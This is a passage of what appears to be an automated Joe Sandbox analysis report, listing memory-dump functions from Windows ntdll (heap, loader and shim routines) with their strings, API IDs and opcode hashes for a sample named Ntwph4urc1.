                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-3589223738
                                            • Opcode ID: 1228296ecc6030fed70853cbc75e309d49b1c7a8e60d3ef0576fc26656ac28df
                                            • Instruction ID: 091e8951214bd6414e344c3af49645ccfc94fefb4cb1cbe4ec4f1a4f24628924
                                            • Opcode Fuzzy Hash: 1228296ecc6030fed70853cbc75e309d49b1c7a8e60d3ef0576fc26656ac28df
                                            • Instruction Fuzzy Hash: 10513376A103189FDB06EBACCC44A9D7BFABB40308F200165E640BF296CB70DC56CB91
                                            Function 3697DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                            • API String ID: 3446177414-3224558752
                                            • Opcode ID: 9e8ccb785b21a363130d4f8ea6ef810a19c30f708307d10aa35932c7d2675d15
                                            • Instruction ID: 0465e2d4ffe9ef5277bd55d3fba2b81ad06bfc9959708f5262b9480917d35263
                                            • Opcode Fuzzy Hash: 9e8ccb785b21a363130d4f8ea6ef810a19c30f708307d10aa35932c7d2675d15
                                            • Instruction Fuzzy Hash: 59414875910748DFEB12CFA4C884B5AB7B8EF44364F2081A9D9016B391CB78AD85CBD1
                                            Function 369FF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Entry Heap Size , xrefs: 369FF26D
                                            • ---------------------------------------, xrefs: 369FF279
                                            • HEAP: , xrefs: 369FF15D
                                            • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 369FF263
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                            • API String ID: 3446177414-1102453626
                                            • Opcode ID: 00b93f542743d364185cb4c73c41e24b6dfa2f612b8fa8b30121575381f36661
                                            • Instruction ID: c4baee637cb75495c4529dd533f86bf6194753b9c9d9a55059b77a632ab17bb8
                                            • Opcode Fuzzy Hash: 00b93f542743d364185cb4c73c41e24b6dfa2f612b8fa8b30121575381f36661
                                            • Instruction Fuzzy Hash: 31417979A20615DFC706DF58C880949BBEAEF4935573681A9D518AF311D733EC43CBA0
                                            Function 3697DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                            • API String ID: 3446177414-1222099010
                                            • Opcode ID: 8905b0fcc836657cc516001b1a8eb4e3142f080f2ffad4d357b235bbd624903e
                                            • Instruction ID: 4839449d6096bae5ef3b2d9b236130a8ce53462380363da50f654116e8defffa
                                            • Opcode Fuzzy Hash: 8905b0fcc836657cc516001b1a8eb4e3142f080f2ffad4d357b235bbd624903e
                                            • Instruction Fuzzy Hash: 39315935504784EFEB22DB68CC48B467BFCEF01754F1440C4E8015B656CBB9EC85CA92
                                            Function 3699B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: d08866918477368b0ac48a952b3e7bf86025d679a279dbce5f57f35466a725b3
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 11810478E0135A9FEF14CE69C8907EFBBF9AF48364F644219D850A7689C7389840CB61
                                            Function 36959126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: $$@
                                            • API String ID: 3446177414-1194432280
                                            • Opcode ID: 570465105df3b23aca43c6b5e59b00ce525a3e64f7036cfaadba59920dc2e2a6
                                            • Instruction ID: 5792ff9f62b86e2d6cccde8dfbe02baef975e1331b92995f347fdff7b7b4f7ab
                                            • Opcode Fuzzy Hash: 570465105df3b23aca43c6b5e59b00ce525a3e64f7036cfaadba59920dc2e2a6
                                            • Instruction Fuzzy Hash: 858169B5D002699FEB21CB55CC44BEEB7B8AF08754F1041EAAA09B7240D7309E85CFA5
                                            Function 36984D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 369C365C
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 369C362F
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 369C3640, 369C366C
                                            • LdrpFindDllActivationContext, xrefs: 369C3636, 369C3662
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 3446177414-3779518884
                                            • Opcode ID: 4ff10f7b077eb9e596849909a110c5cf7d68228fc7aa60421ac05a00ca308d63
                                            • Instruction ID: 8e533147e8045d90afba5f62963f4a315c0784b2f542dd05b992cbe85c1bc5bc
                                            • Opcode Fuzzy Hash: 4ff10f7b077eb9e596849909a110c5cf7d68228fc7aa60421ac05a00ca308d63
                                            • Instruction Fuzzy Hash: ED310466D00751EEFB21DA09CC88A1677ECAF05B98F66406BE90467251EB60BC80C6F6
                                            Function 3697245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpDynamicShimModule, xrefs: 369BA998
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 369BA992
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369BA9A2
                                            • apphelp.dll, xrefs: 36972462
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 9cd6edea1bb47ea24d6ad7dd0c610032e383012a31126bdd548198919b9bb459
                                            • Instruction ID: 47c488bf3e85b289ce9626fbfcc5d14642e1c31082ae1a200c6010b09d6ee7cf
                                            • Opcode Fuzzy Hash: 9cd6edea1bb47ea24d6ad7dd0c610032e383012a31126bdd548198919b9bb459
                                            • Instruction Fuzzy Hash: AC31E475A10301ABEB12DF5D8C40A5ABBBAEB84754F710059EA006B351CAB69C53DB90
                                            Function 3694F910 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 3446177414-3610490719
                                            • Opcode ID: dd3277f2e9535a3df53150b0518dd8284c436e9b7d6dd3d9fd07ed344771b781
                                            • Instruction ID: 47b789133327efa5802e93b71c0e214b0dd00d5ac8fdaaf0f147f688bc94e355
                                            • Opcode Fuzzy Hash: dd3277f2e9535a3df53150b0518dd8284c436e9b7d6dd3d9fd07ed344771b781
                                            • Instruction Fuzzy Hash: 6B911171A14752DFE717EF25CC90B2AB7E9BF84694F100459E9409B282EB34EC41CB92
                                            Function 36970BCB Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Failed to allocated memory for shimmed module list, xrefs: 369BA10F
                                            • LdrpCheckModule, xrefs: 369BA117
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369BA121
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-161242083
                                            • Opcode ID: 3d394a3929180e31bbef5f383bff8a7dbdef501ccff0a751d5d1314eab1f0f9a
                                            • Instruction ID: 8cb8921758b51139fa589d5e082c59cbd45826d12181c116264522e5646856ff
                                            • Opcode Fuzzy Hash: 3d394a3929180e31bbef5f383bff8a7dbdef501ccff0a751d5d1314eab1f0f9a
                                            • Instruction Fuzzy Hash: 7571ACB4E003059FEF15DF68CD80AAEBBF9EF88304F294069D901EB251E675AD42CB51
                                            Function 36979803 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 3446177414-2283098728
                                            • Opcode ID: 8c9e2aeafb190e0eb4e40d4a4bf6f79db9e1e77392b1830a7779740fd107e555
                                            • Instruction ID: fd76c32702987b0396b2a9cb8c0da054f250af9a9bc9517fb4a01dce7e40a696
                                            • Opcode Fuzzy Hash: 8c9e2aeafb190e0eb4e40d4a4bf6f79db9e1e77392b1830a7779740fd107e555
                                            • Instruction Fuzzy Hash: 99511671B043029FE715DF29CC84B19B7ADFF84328F24062DE9959B292DB34E815CB82
                                            Function 3698C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 369C82DE
                                            • minkernel\ntdll\ldrinit.c, xrefs: 369C82E8
                                            • Failed to reallocate the system dirs string !, xrefs: 369C82D7
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 3446177414-1783798831
                                            • Opcode ID: 95867a132bae9c4f82ee0f8ab48372f27b1e9db7ba9ae2c275d831af277b88b0
                                            • Instruction ID: 17d2f40e82283cd9103d5cf7e6bae7cc10af05344a184e182b621f086dbe5b32
                                            • Opcode Fuzzy Hash: 95867a132bae9c4f82ee0f8ab48372f27b1e9db7ba9ae2c275d831af277b88b0
                                            • Instruction Fuzzy Hash: 034110B5918310EBD722DB28CD40B4B7BE8EF45650F10492AFA48E7251EB35DC02CB92
                                            Function 3698BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Resource at %p, xrefs: 369C7B8E
                                            • RTL: Re-Waiting, xrefs: 369C7BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 369C7B7F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: f55c44530c9477935f2663f12ab541d49bf147a6746cddc7da2eb1ebc6504445
                                            • Instruction ID: 5e936d0619c44aa56433065e852b961ef8218a752fa10ad17f683162ebb058b7
                                            • Opcode Fuzzy Hash: f55c44530c9477935f2663f12ab541d49bf147a6746cddc7da2eb1ebc6504445
                                            • Instruction Fuzzy Hash: 02411479B017029FE710DE25CC40B57B7E9EF88720F240A2DF9699B281DB30E805CB92
                                            Function 3698B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 369C728C
                                            Strings
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 369C7294
                                            • RTL: Resource at %p, xrefs: 369C72A3
                                            • RTL: Re-Waiting, xrefs: 369C72C1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: a70dcd179c96d9ab2eafc8905a5229ee96337ad7bb4e00e8e06f026279aabf44
                                            • Instruction ID: 1594992a19906817ef1f5e689f0f686552d5d59e1203b334e3ee875ffbe89c84
                                            • Opcode Fuzzy Hash: a70dcd179c96d9ab2eafc8905a5229ee96337ad7bb4e00e8e06f026279aabf44
                                            • Instruction Fuzzy Hash: 0C410275B00316AFE710CE25CC42B56B7B9FF84764F240619F954EB241DB20E806CBD2
                                            Function 369D4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 369D4888
                                            • LdrpCheckRedirection, xrefs: 369D488F
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 369D4899
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 3446177414-3154609507
                                            • Opcode ID: d601a3aaa7b40d3a842bb5f852cbca4bab58949f2bdaf5690e93973ef1299ab2
                                            • Instruction ID: c8991134adf440fdf1bc953189b10e0333583786ef588cc9e6ddabe67bfb63ae
                                            • Opcode Fuzzy Hash: d601a3aaa7b40d3a842bb5f852cbca4bab58949f2bdaf5690e93973ef1299ab2
                                            • Instruction Fuzzy Hash: 0741AD76A14361DFDB11CE69C840A16BBE9AB89E90F218579ED88AB311D731DC00CBE1
                                            Function 36A02300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: f4153fd7d1338616bd9855a4c1fb7614a1d7c1f9771dfae089650beee390ae53
                                            • Instruction ID: 6df8f147745b4cfe84ae1fc745ed9cda0039a2c902781ecf1404b53f6827c0ed
                                            • Opcode Fuzzy Hash: f4153fd7d1338616bd9855a4c1fb7614a1d7c1f9771dfae089650beee390ae53
                                            • Instruction Fuzzy Hash: C9318276A003199FDB10DF29DC50BEEB7F8EB48650F904596EC49E7240EB30AA458FA1
                                            Function 369D5F10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: Wow64 Emulation Layer
                                            • API String ID: 3446177414-921169906
                                            • Opcode ID: d1bf7a7b01bcbeade5416c85d9fd303e7746cbaa3fbae3b8f83fa5f64668a025
                                            • Instruction ID: eed31da3e1129538cd8ea4a1ea6d82007eb4c6cca2411792f7c867433f2072ab
                                            • Opcode Fuzzy Hash: d1bf7a7b01bcbeade5416c85d9fd303e7746cbaa3fbae3b8f83fa5f64668a025
                                            • Instruction Fuzzy Hash: 61214A7690021DBFAF019AA58C84DBF7F7DEF89298B004464FA01A6204DA34DE16EB70
                                            Function 3697EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ad384593b213f5ec7aee3e82e9aff0fd10ad3f0632bf029e40ca70fa82dae60a
                                            • Instruction ID: 7deca8e1ba76c530d02419e93b77467171f8937c7b7394caea7eb6444d45da7a
                                            • Opcode Fuzzy Hash: ad384593b213f5ec7aee3e82e9aff0fd10ad3f0632bf029e40ca70fa82dae60a
                                            • Instruction Fuzzy Hash: 17E10EB4D00708DFEB21CFAAC980A9DBBF5BF48314F20456AE965B7621DB31A841CF50
                                            Function 369CEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 77c85101a1bd777766e4543ec6d02569677021cfc4d924330a79f86e90dabf5a
                                            • Instruction ID: fe217746c043620d5334b1345852f0c1246ac92345ca334be5c806c2a4969c49
                                            • Opcode Fuzzy Hash: 77c85101a1bd777766e4543ec6d02569677021cfc4d924330a79f86e90dabf5a
                                            • Instruction Fuzzy Hash: FC7127B1E003199FEF05CFA9D980ADDBBB5BF48354F14402AE905FB254D734A906CBA2
                                            Function 36A2A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 1a53104f3d058b25459f1016d9f4dd6022ed7660f75cc65e888f9322156f488e
                                            • Instruction ID: 226402d0de89177dbd4e63efbe1b71b5dd188c705c90487ddb88b8832db0bab8
                                            • Opcode Fuzzy Hash: 1a53104f3d058b25459f1016d9f4dd6022ed7660f75cc65e888f9322156f488e
                                            • Instruction Fuzzy Hash: 56516D75B54B229FEB08CE19C8A4A1AB7F1BB49354B20406DDE06DB710DBB5EC51CB80
                                            Function 369CF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
